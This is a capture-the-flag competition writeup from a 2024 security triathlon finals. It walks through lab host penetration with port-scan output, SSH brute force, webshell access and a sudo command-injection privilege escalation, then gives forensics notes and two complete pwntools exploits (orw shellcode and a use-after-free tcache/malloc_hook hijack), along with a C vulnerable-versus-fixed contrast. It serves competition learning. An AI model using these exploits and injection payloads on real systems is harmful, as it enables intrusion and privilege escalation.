1st Great Wall Cup Information Security Triathlon Finals WriteUp

Maybe it's a kind of growth

Out of 80-some teams we only finished 60th and took a consolation third prize. Everyone else is so strong; the gap between me and them still seems large.

I prepared a lot before the competition, but in the end it didn't get used. The challenges were all pretty good, split into penetration testing, forensics and attribution (really just traffic analysis plus connecting to the target box and investigating), and CTF.

I was mainly responsible for the penetration part and helped teammates look at forensics on the side. I had assumed the forensics would resemble the format of forensics competitions and that I'd have some grip on it, but that wasn't the case.

Reflecting afterwards: within the 8 hours there were some challenges I could actually have solved; I just lacked a bit of persistence and wasn't willing to grind on the parts I'm not good at. Hope I can do better next time.

Enterprise environment penetration

Attacker machine IP

```
192.168.177.12
```

Target IPs

```
202.0.7.200
202.0.7.201
202.0.7.199
```

202.0.7.199

```
.\fscan64.exe -h 202.0.7.199 -p 1-65535
```

```
   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 202.0.7.199 is alive
[*] Icmp alive hosts len is: 1
202.0.7.199:22 open
202.0.7.199:80 open
202.0.7.199:8080 open
[*] alive ports len is: 3
start vulscan
[*] WebTitle: http://202.0.7.199 code:200 len:1428 title:Photo Site | Index
[*] WebTitle: http://202.0.7.199:8080 code:200 len:713 title:T3 GAMES
已完成 2/3 [-] ssh 202.0.7.199:22 root root@123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 202.0.7.199:22 root 666666 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 202.0.7.199:22 root Aa123123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 202.0.7.199:22 admin 123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 202.0.7.199:22 admin test123 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 2/3 [-] ssh 202.0.7.199:22 admin a123456 ssh: handshake failed: ssh: unable to authenticate, attempted methods [none password], no supported methods remain
已完成 3/3
[*] 扫描结束,耗时: 10m46.0372215s
```

Directory scanning

flag2 was found at 202.0.7.199/dashboard.html.

In the /uploads directory there were both shell.php and shell.txt; reading shell.txt lets you infer the contents and the language of shell.php.

Testing showed that this webshell works.

Connected with AntSword and found flag1, flag3 and flag4 by browsing around.

In /home/athena/password-reminder.txt we saw

From that, guessed at the SSH password, generated a wordlist, and brute-forced it.

```
athena
password76
```

Brute-force succeeded; read the flag.

Checked the network segment

```
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: ens3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether fa:16:3e:2a:0a:97 brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.2/24 brd 10.10.10.255 scope global ens3
       valid_lft forever preferred_lft forever
    inet6 fe80::f816:3eff:fe2a:a97/64 scope link
       valid_lft forever preferred_lft forever
```

Scanning the internal segment turned up nothing new.

Then tried privilege escalation; neither SUID binaries nor kernel exploits worked.

```
[+] [CVE-2019-13272] PTRACE_TRACEME
   Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
   Exposure: highly probable
   Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
   Download URL: https://gitlab.com/exploit-database/exploitdb-binsploits/-/raw/main/bin-sploits/47133.zip
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
   Comments: Requires an active PolKit agent.
[+] [CVE-2021-3156] sudo Baron Samedit
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: mint=19,ubuntu=18|20, debian=10
   Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
   Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
   Exposure: less probable
   Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
   Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
```

After the competition, reading other players' writeups, I learned the privesc was through the odd-looking cookie-gen.py under /home/team-tasks, something that would never exist in a normal environment:

```
sudo /usr/bin/python /home/team-tasks/cookie-gen.py
```

After running it, enter the command you want executed, for example

```
1;cat /root/fl*||
```

Then entering 1 again prints what cat read, which is the flag.

202.0.7.200

A fairly hard pwn challenge; our team's pwn expert didn't get through it.

```
.\fscan64.exe -h 202.0.7.200 -p 1-65535
```

```
   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.2
start infoscan
(icmp) Target 202.0.7.200 is alive
[*] Icmp alive hosts len is: 1
202.0.7.200:22 open
202.0.7.200:8888 open
202.0.7.200:8899 open
[*] alive ports len is: 3
start vulscan
已完成 0/3 [-] webtitle http://202.0.7.200:8888 Get "http://202.0.7.200:8888": net/http: HTTP/1.x transport connection broken: malformed HTTP status code "/"
[*] WebTitle: http://202.0.7.200:8899 code:200 len:658 title:内测页面
```

202.0.7.201

```
python dirsearch.py -u http://202.0.7.201/
```

Downloaded the Excel file linked from /index.html; opening it revealed the flag.

I didn't solve the rest at the time; my code-auditing skills still need work. It was really just uploading a shell by bypassing the upload filter with directory traversal.

After that, a one-shot msf kernel privilege escalation finishes it.

Forensics and attribution

1. Find the attacker IP in the traffic capture

The reverse shell reveals another IP

2. Unpack and decompile the APK file to find the password

3. In the capture, the response for pic.jpg is "insufficient permissions"

4. Review the traffic to get the API endpoint

5. Find the webshell location on the server

8. The privilege obtained through the backdoor can only be tomcat

9. cat /etc/*-release gives the version information

10. The secret file is right next to the webshell

12, 13: guessed

14.

CTF challenges

SandBoxShell

ret2shellcode

Use the orw (open/read/write) technique to read out the flag.

```python
from pwn import *
context(log_level='debug', arch='amd64', os='linux')
p = remote('202.0.5.192', 8888)
#p = process('./SandBoxShell')
#gdb.attach(p)
# orw shellcode: open('./flag'), read it onto the stack, write it to stdout
shellcode = shellcraft.open('./flag') + shellcraft.read('rax', 'rsp', 0x100) + shellcraft.write(1, 'rsp', 0x100)
payload1 = asm(shellcode)

p.sendline(payload1)

p.interactive()
```

Old_man_v1

In the dele function the pointer is not cleared after free, so there is a UAF.
First use the UAF to free a chunk into the unsorted bin and leak an address.
Then request a 0x70-sized chunk to split the chunk sitting in the unsorted bin, free it again, and use the stale unsorted-bin pointer that was never cleared
to get a heap overflow; forge a fake chunk in the tcache bin to hijack malloc_hook to a one_gadget and get a shell.
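As an added illustration of the bug described above (this is not the challenge's code; the note-store layout is a hypothetical reconstruction), here is the free-without-clearing delete next to a delete that clears the slot, so that show and edit on a freed index are refused instead of touching freed memory:

```c
#include <stdlib.h>
#include <string.h>
/* Constructed model of the challenge's note store (hypothetical, not the
 * challenge binary): a fixed table of heap chunks indexed by case number. */
#define MAX_CASES 8
static char *cases[MAX_CASES];
static size_t sizes[MAX_CASES];

static int valid_index(int idx) { return idx >= 0 && idx < MAX_CASES; }
/* Allocate a case of `size` bytes holding `content`; returns 0 on success. */
int add_case(int idx, size_t size, const char *content) {
    if (!valid_index(idx) || cases[idx] != NULL || size == 0) return -1;
    cases[idx] = malloc(size);
    if (cases[idx] == NULL) return -1;
    sizes[idx] = size;
    strncpy(cases[idx], content, size - 1);
    cases[idx][size - 1] = '\0';
    return 0;
}

/* Bug class from the writeup: free() without clearing the slot, so cases[idx]
 * still points into freed memory and a later show/edit on this index reads or
 * writes allocator freelist metadata (use-after-free). Kept for contrast. */
void delete_case_vuln(int idx) {
    if (!valid_index(idx) || cases[idx] == NULL) return;
    free(cases[idx]);   /* missing: cases[idx] = NULL; */
}

/* Fix: clear the slot, so the index is unusable after free and a second
 * delete is rejected instead of turning into a double free. */
int delete_case_fixed(int idx) {
    if (!valid_index(idx) || cases[idx] == NULL) return -1;
    free(cases[idx]);
    cases[idx] = NULL;
    return 0;
}

/* show/edit reject NULL slots, which only covers freed cases when delete
 * actually clears the slot. */
const char *show_case(int idx) {
    return (valid_index(idx) && cases[idx] != NULL) ? cases[idx] : NULL;
}

int edit_case(int idx, const char *data) {
    if (!valid_index(idx) || cases[idx] == NULL) return -1;
    strncpy(cases[idx], data, sizes[idx] - 1);
    cases[idx][sizes[idx] - 1] = '\0';
    return 0;
}
```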

```python
from pwn import *
context.log_level = 'debug'
#r = process("./Old_man_v1")   # local debugging alternative to the remote target
r = remote('202.0.5.192', 9999)
#libc = ELF("/home/xyan/tools/glibc-all-in-one/libs/2.27-3ubuntu1.5_amd64/libc-2.27.so")
#gdb.attach(r)
libc = ELF("./libc-2.27.so")

def add(index, size, content):
    r.recvuntil("4:This old man's case is no longer needed")
    r.sendline(b'1')
    r.recvuntil("Which elderly case do you need to add?")
    r.sendline(str(index))
    r.recvuntil("How much content does this elderly person's case need to include?:")
    r.sendline(str(size))
    r.recvuntil("So what are you going to write about:")
    r.sendline(content)

def delete(index):
    r.recvuntil("4:This old man's case is no longer needed")
    r.sendline(b'4')
    r.recvuntil("Which elderly case do you want to delete?")
    r.sendline(str(index))

def edit(index, data):
    r.recvuntil("4:This old man's case is no longer needed")
    r.sendline(b'3')
    r.recvuntil("Which elderly case do you want to edit?")
    r.sendline(str(index))
    r.recvuntil("So what are you going to write about:")
    r.sendline(data)

def show(index):
    r.recvuntil("4:This old man's case is no longer needed")
    r.sendline(b'2')
    r.recvuntil("Which elderly case do you want to show?")
    r.sendline(str(index))

#libc_base = 0x7ffff7a62970 - libc_puts
#log.success("libc_base addr is -> %s" %hex(libc_base))
one1 = 0x4f2a5
one2 = 0x4f302
one3 = 0x10a2fc

# free a large chunk into the unsorted bin, then show() through the stale pointer to leak main_arena
add(0, 0x420, "a")
add(1, 0x420, "a")
delete(0)

show(0)

main_area_96 = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
log.success("main_area is ---> %s" %hex(main_area_96))
malloc_hook = main_area_96 - 112
libc_base = malloc_hook - libc.symbols['__malloc_hook']
one_gadget = libc_base + one3
log.success("one_gadget is ---> %s" %hex(one_gadget))
fake_chunk = main_area_96 - 96 - 0x33
log.success("fake_chunk is ---> %s" %hex(fake_chunk))
# split the unsorted chunk with 0x70 allocations, free them into tcache, then overwrite the tcache fd via the stale chunk 0
add(2, 0x70, "a")
add(3, 0x70, "a")
delete(2)
delete(3)
payload = b"\x00"*0x70 + p64(0x81) + (p64(fake_chunk+0x10)*2)
#
edit(0, payload)
add(4, 0x70, "a")
add(5, 0x70, b'a'*0x13 + p64(one_gadget))
#gdb.attach(r)
# one more allocation triggers __malloc_hook
r.recvuntil("4:This old man's case is no longer needed")
r.sendline(b'1')
r.recvuntil("Which elderly case do you need to add?")
r.sendline(str(6))
r.recvuntil("How much content does this elderly person's case need to include?:")
r.sendline(str(0x20))

r.interactive()
```

Source: https://www.smal1.black/2024长城杯信息安全铁人三项赛总决赛-WP.html
Author: Small Black
Published: July 4, 2024